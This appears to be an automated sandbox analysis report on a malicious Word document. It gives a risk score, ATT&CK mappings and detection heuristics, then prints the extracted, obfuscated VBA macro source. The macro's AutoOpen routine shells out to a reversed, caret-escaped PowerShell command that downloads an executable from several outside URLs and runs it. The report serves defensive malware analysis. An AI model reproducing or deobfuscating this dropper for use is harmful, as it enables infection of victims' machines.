MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute a shell command, likely to download and run a second-stage payload. The macro code is heavily obfuscated, but the presence of the AutoOpen function and the ClamAV detection strongly indicate malicious intent.
Heuristics 5
-
ClamAV: Doc.Downloader.00536d-6690604-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6690604-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5865 bytes |
SHA-256: cd9483d9a3f4de5a743aae9b4b36da3f47429d80c78a79f10903c4ca3f96d977 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "LhPBpKcukiC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const XzBjvOXRG = 0
Dim fWVLTj(2)
fWVLTj(0) = MidB(hONKDdVO, 885, 566)
fWVLTj(1) = MidB(hONKDdVO, 885, 566)
Dim ZlpqI(5)
ZlpqI(0) = MidB(hONKDdVO, 885, 566)
ZlpqI(1) = MidB(hONKDdVO, 885, 566)
ZlpqI(2) = Right(zrLHbwkS, 815)
ZlpqI(3) = Left(JdjfWw, 643)
ZlpqI(4) = Left(JdjfWw, 643)
Dim iGsofz(2)
iGsofz(0) = Left(JdjfWw, 643)
iGsofz(1) = Mid(hzsSsS, 169, 865)
Dim nwUYP(3)
nwUYP(0) = MidB(hONKDdVO, 885, 566)
nwUYP(1) = MidB(hONKDdVO, 885, 566)
nwUYP(2) = Mid(hzsSsS, 169, 865)
Dim thwPQl(5)
thwPQl(0) = Left(JdjfWw, 643)
thwPQl(1) = Left(JdjfWw, 643)
thwPQl(2) = Mid(hzsSsS, 169, 865)
thwPQl(3) = Left(JdjfWw, 643)
thwPQl(4) = Right(zrLHbwkS, 815)
Dim JbYqQ(3)
JbYqQ(0) = Mid(hzsSsS, 169, 865)
JbYqQ(1) = Left(JdjfWw, 643)
JbYqQ(2) = Left(JdjfWw, 643)
Dim pKhiR(3)
pKhiR(0) = Mid(hzsSsS, 169, 865)
pKhiR(1) = Right(zrLHbwkS, 815)
pKhiR(2) = Mid(hzsSsS, 169, 865)
Shell@ zFcKWSPrk + mnMwadtkTcMar + XzorwUROs, XzBjvOXRG
Dim jOkqt(2)
jOkqt(0) = Left(JdjfWw, 643)
jOkqt(1) = MidB(hONKDdVO, 885, 566)
Dim AtcXP(2)
AtcXP(0) = Mid(hzsSsS, 169, 865)
AtcXP(1) = Right(zrLHbwkS, 815)
Dim aOBFwj(3)
aOBFwj(0) = Left(JdjfWw, 643)
aOBFwj(1) = MidB(hONKDdVO, 885, 566)
aOBFwj(2) = Right(zrLHbwkS, 815)
Dim pJcDor(3)
pJcDor(0) = Left(JdjfWw, 643)
pJcDor(1) = Right(zrLHbwkS, 815)
pJcDor(2) = Right(zrLHbwkS, 815)
End Sub
Attribute VB_Name = "ZUwMziAcjq"
Function zFcKWSPrk()
Dim vXlRq(5)
vXlRq(0) = Left(JdjfWw, 643)
vXlRq(1) = Left(JdjfWw, 643)
vXlRq(2) = MidB(hONKDdVO, 885, 566)
vXlRq(3) = Right(zrLHbwkS, 815)
vXlRq(4) = Left(JdjfWw, 643)
Dim hIKUK(2)
hIKUK(0) = Right(zrLHbwkS, 815)
hIKUK(1) = Left(JdjfWw, 643)
ituVWb = Chr(Format(9 + 3 + 16 + 8 + 63)) + "md /V/" + Chr(Format(6 + 2 + 11 + 5 + 43)) + Chr(Format(3 + 1 + 5 + 2 + 23)) + "s^e^t" + " ^O" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "E^j= ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^}^}{^h" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "t^a" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "};^k^a^erb^;" + "Tv^L$ ^m^et^I^-" + "ek^ovn^I;)^Tv"
Dim ijnnhl(2)
ijnnhl(0) = Mid(hzsSsS, 169, 865)
ijnnhl(1) = Left(JdjfWw, 643)
Dim iJLFu(4)
iJLFu(0) = Mid(hzsSsS, 169, 865)
iJLFu(1) = MidB(hONKDdVO, 885, 566)
iJLFu(2) = Right(zrLHbwkS, 815)
iJLFu(3) = Right(zrLHbwkS, 815)
Dim oBUWUK(4)
oBUWUK(0) = MidB(hONKDdVO, 885, 566)
oBUWUK(1) = Right(zrLHbwkS, 815)
oBUWUK(2) = Mid(hzsSsS, 169, 865)
oBUWUK(3) = Left(JdjfWw, 643)
cmDhH = "L$ ,^s^" + "Tp^$(e^li^" + "Fdaolnw^o^D^.B^k^k$^{^yr^t" + "{)wZZ$ ni^ ^s^Tp^$(h" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "a^er" + "^o^f;'ex^e^.'^+^SV^j$+'" + "\'+" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "^i" + "lb^u^p:vn^e^$^=TvL^$^;'5^1^1'"
Dim UTpBT(2)
UTpBT(0) = Right(zrLHbwkS, 815)
UTpBT(1) = Mid(hzsSsS, 169, 865)
Dim FrbUX(5)
FrbUX(0) = Mid(hzsSsS, 169, 865)
FrbUX(1) = Mid(hzsSsS, 169, 865)
FrbUX(2) = MidB(hONKDdVO, 885, 566)
FrbUX(3) = Left(JdjfWw, 643)
FrbUX(4) = MidB(hONKDdVO, 885, 566)
nAHbw = " =^ ^SV^j$^;)'@'(^t^il^p" + "S.^'i^H^x" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "wSG/ur^" + ".tkelpmok-^mes//^:p^t" + "t^h@LJgv^o" + "^w^8^04/^ln.b^bo^ot^s//:p^t^"
Dim JwjNZ(4)
JwjNZ(0) = Right(zrLHbwkS, 815)
JwjNZ(1) = Mid(hzsSsS, 169, 865)
JwjNZ(2) = Left(JdjfWw, 643)
JwjNZ(3) = Mid(hzsSsS, 169, 865)
JzuKhAzw = "t^h^@^d^m^8r^Q^K^tx" + "m/m^o" + Chr(Format(9 + 3 + 16 + 8 + 63)) + ".o^es^alov^e" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "snho^j//:^pt^t^h@^1^f^" + "e" + Chr(Format(6 + 2 + 11 + 5 + 43)) + "^x^J^L^t/m^o" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "^.20^b" + "ef20//^:pt^t^" + "h@" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "^4M^5^F" + "rd/^m^o" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "^.av^i^t^a^er"
Dim jVqzR(5)
jVqzR(0) = Mid(hzsSsS, 169, 865)
jVqzR(1) = Right(zrLHbwkS, 815)
jVqzR(2) = Mid(hzsSsS, 169, 865)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.